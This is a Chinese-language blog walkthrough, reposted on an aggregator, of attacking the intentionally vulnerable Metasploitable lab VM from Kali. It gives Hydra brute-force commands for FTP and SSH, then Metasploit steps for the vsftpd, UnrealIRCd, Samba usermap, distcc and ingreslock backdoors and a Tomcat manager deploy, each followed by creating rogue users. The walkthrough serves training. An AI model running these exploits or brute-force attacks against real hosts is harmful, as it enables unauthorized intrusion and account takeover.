手把手教你kali渗透Metasploitable

这篇具有很好参考价值的文章主要介绍了手把手教你kali渗透Metasploitable。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

记一次kali渗透Metasploitbale靶机

1.网络设置

手把手教你kali渗透Metasploitable

2.ifconfig查看Metasploitable的IP:

手把手教你kali渗透Metasploitable

3.对Metasploitbale进行nmap端口扫描:

Nmap 192.168.22.128

手把手教你kali渗透Metasploitable

端口爆破:FTP、SSH等

工具:Hydra

备用字典:user.txt: 手把手教你kali渗透Metasploitable

pass,txt: 手把手教你kali渗透Metasploitable

一、 爆破FTP

手把手教你kali渗透Metasploitable

hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt  ftp://192.168.22.128

//注意路径是桌面还是Desktop

手把手教你kali渗透Metasploitable

二、 爆破SSH

hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt 192.168.22.128 ssh

手把手教你kali渗透Metasploitable

利用爆破得到的用户名和密码,进行远程连接测试:

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

成功连接:

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

三、端口渗透:

利用metasploit 然后在kali linux中进行渗透:

启动msf msfconsole

手把手教你kali渗透Metasploitable

1.端口1: 1524—ingrelock_backdoor

利用telnet连接1524,直接返回root会话

手把手教你kali渗透Metasploitable

创建用户ss

手把手教你kali渗透Metasploitable
成功:
手把手教你kali渗透Metasploitable

2.端口2、1099—distcc程序漏洞—ingrelock

利用metasploit并设置靶机ip进行爆破
手把手教你kali渗透Metasploitable

报错,提示未设置payload:

手把手教你kali渗透Metasploitable

设置payload:

 set payload cmd/unix/bind_perl

获取到daemon权限:

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

3.端口3、139—samba为3.0漏洞

先用nmap进行详细扫描

 nmap -v -A -T4 192.168.22.128

手把手教你kali渗透Metasploitable

再用scanner模块进行端口扫描

手把手教你kali渗透Metasploitable

全端口版本检测:

nmap -sV 192.168.22.128

手把手教你kali渗透Metasploitable

发现Samba

利用metasploit

手把手教你kali渗透Metasploitable

利用 exploit/multi/samba/usermap_script

手把手教你kali渗透Metasploitable

Set rhost 192.168.22.128  //设置靶机ip
Exploit

输入whoami,可以看到已经获取到root权限。
手把手教你kali渗透Metasploitable

useradd -m ht -p ht   // 创建用户名为ht的用户

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

4.端口4: 6667—irc_3281_backdoor

登录msf ,search irc 找到对应得模块

手把手教你kali渗透Metasploitable

利用该模块exploit/unix/irc/unreal_ircd_3281_backdoor

use exploit/unix/irc/unreal_ircd_3281_backdoor
Show options

手把手教你kali渗透Metasploitable

设置靶机名 进行漏洞利用 exploit ,

未成功,提示A payload has not been selected
手把手教你kali渗透Metasploitable

设置payload:

set payload cmd/unix/bind_perl

成功获取root权限
手把手教你kali渗透Metasploitable

创建用户aa

手把手教你kali渗透Metasploitable手把手教你kali渗透Metasploitable

5.端口5 6200—vsftpd_234_backdoor

利用metasploit 找到利用模块

手把手教你kali渗透Metasploitable

利用该模块:

use exploit/unix/ftp/vsftpd_234_backdoor  
show options

手把手教你kali渗透Metasploitable

设置靶机名,进行漏洞利用

获取到root权限

手把手教你kali渗透Metasploitable

useradd -m ht1 -p aa  //创建用户ht1

手把手教你kali渗透Metasploitable
手把手教你kali渗透Metasploitable

6.端口6:8180—Apache Tomcat弱口令

在终端中输入命令“nmap –sV 192.168.22.128”,对目标主机进行端口扫描,发现开放8180端口并且运行 着ApacheTomcat/CoyoteJSP engine1.1。

手把手教你kali渗透Metasploitable
利用该模块:

search tomcat   //搜索tomcat的相关工具和攻击载荷
use auxiliary/scanner/http/tomcat_mgr_login  //启用漏洞利用模块, 提示符就会提示进入到该路径下

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

set rhost 192.168.22.128    //设置攻击目标主机IP
set rport 8180     //设置攻击目标主机端口号
exploit   //实施攻击

获得用户名tomcat,密码tomcat。

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

也可用另一种方式获取到tomcat用户名和密码(这里不做展示):使用use auxiliary/scanner/http/tomcat_mgr_login进行账户爆破 用默认自带的字典即可,如果用桌面上字典 则需要设置set PASS_FILE ‘root/Desktop/password.txt’ & set USER_FILE ‘root/Desktop/user.txt’,然后设置主机名和端口(同上)->show options->run即可。

获取到用户名和密码后使用deploy模块进行攻击:

手把手教你kali渗透Metasploitable

 use exploit/multi/http/tomcat_mgr_deploy

报错:

手把手教你kali渗透Metasploitable

查看payloads

手把手教你kali渗透Metasploitable

设置payload:
手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

设置靶机ip和端口以及用户名和密码

手把手教你kali渗透Metasploitable成功获取到tomcat会话:

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

也可以如下图设置:

手把手教你kali渗透Metasploitable
**如果对你有帮助的话,希望可以点赞、收藏或关注哦! **文章来源地址https://www.toymoban.com/news/detail-462906.html

到了这里,关于手把手教你kali渗透Metasploitable的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 手把手教你落地DDD

    一、前言 常见的DDD实现架构有很多种,如经典四层架构、六边形(适配器端口)架构、整洁架构(Clean Architecture)、CQRS架构等。架构无优劣高下之分,只要熟练掌握就都是合适的架构。本文不会逐个去讲解这些架构,感兴趣的读者可以自行去了解。 本文将带领大家从日常的

    2024年02月16日
    浏览(34)
  • 手把手教你实战TDD

    领域驱动设计,测试驱动开发。 我们在《手把手教你落地DDD》一文中介绍了领域驱动设计(DDD)的落地实战,本文将对测试驱动开发(TDD)进行探讨,主要内容有:TDD基本理解、TDD常见误区、TDD技术选型,以及案例实战。希望通过本文,读者能够理解掌握TDD并将其应用于实际

    2024年02月08日
    浏览(31)
  • 手把手教你做主成分分析

    主成分分析是一种降维处理的统计方法,实践中有三个应用场景: 信息浓缩:将多个分析项浓缩成几个关键概括性指标; 权重计算:利用方差解释率值计算各概括性指标的权重; 综合评价:基于主成分得分构造综合得分数据,用于综合评价。 接下来,以一个具体案例来学习

    2024年02月01日
    浏览(39)
  • 手把手教你绘制小程序海报

    海报分享功能在许多应用中应该是很常见的,因为它作为一种常用的应用推广和拉新的方式。 接下来看个实际的案例,如下: 把任务拆解下: 如何绘制海报 如何把绘制后的海报保存到相册 用 canvas 来绘制海报。 这里需要了解基本的 canvas api ,不熟悉可以先去了解下相关

    2024年02月04日
    浏览(44)
  • 手把手教你小程序反编译

    1.反编译工具unveilr :百度网盘链接:https://pan.baidu.com/s/10Wle8CwvBq54GPWcbEnxLQ 提取码:bivh   解压即可用。 2.微信开发者工具:https://developers.weixin.qq.com/miniprogram/dev/devtools/stable.html 1.获取小程序存储文件夹 (1)打开PC端微信设置,在文件管理中找到存储路径,选择打开文件夹。

    2024年04月12日
    浏览(34)
  • 手把手教你如何使用Docker

    我们在公司开发中,会有开发环境,测试环境,上线环境, 比如我们开发人员开发好了一个项目,在开发环境中运行正常,但测试人员拉到测试环境就跑不起来【jdk版本等】,或者上线的时候运行不起来,这时候就要为每个机器配置一个环境,那运维人员不得累死?【哈哈,

    2024年02月10日
    浏览(50)
  • 手把手教你如何使用SimiliarWeb

    在之前的“手把手教你如何使用Google Trends”文章中我们讲到从事跨境电商的卖家第一步遇到的问题是“客户在哪里?”该如何推广我的产品?因此若想自己的店铺做大做好,则需要工具来帮助分析市场行情,根据市场行情调整自己的业务状况。小编在上篇中已经讲解了三个特

    2024年02月09日
    浏览(42)
  • 手把手教你用代码画架构图

    作者:京东物流 覃玉杰 本文将给大家介绍一种简洁明了软件架构可视化模型——C4模型,并手把手教大家如何使用 代码 绘制出精美的C4架构图。 阅读本文之后,读者画的架构图将会是这样的: 注:该图例仅作绘图示例使用,不确保其完整性、可行性。 C4是软件架构可视化

    2024年02月04日
    浏览(41)
  • 手把手教你玩Hugging Face

    Hugging Face起初是一家总部位于纽约的聊天机器人初创服务商,他们本来打算创业做聊天机器人,然后在github上开源了一个Transformers库,虽然聊天机器人业务没搞起来,但是他们的这个库在机器学习社区迅速大火起来。目前已经共享了超100,000个预训练模型,10,000个数据集,变成

    2024年02月06日
    浏览(42)
  • 手把手教你怎么写顺序表

    目录 一、顺序表有什么功能? 二、实现顺序表的各个功能 1.前置准备 2.初始化顺序表 3.顺序表扩容 4.打印顺序表 5.增加顺序表成员 5.1尾增 5.2头增  6.删除顺序表中成员的内容 6.1尾删 6.2头删  7.查找成员  8.修改(替换) 9.插入(在目标位置插入成员) 10.定向删除(将目标位置的成

    2024年02月15日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包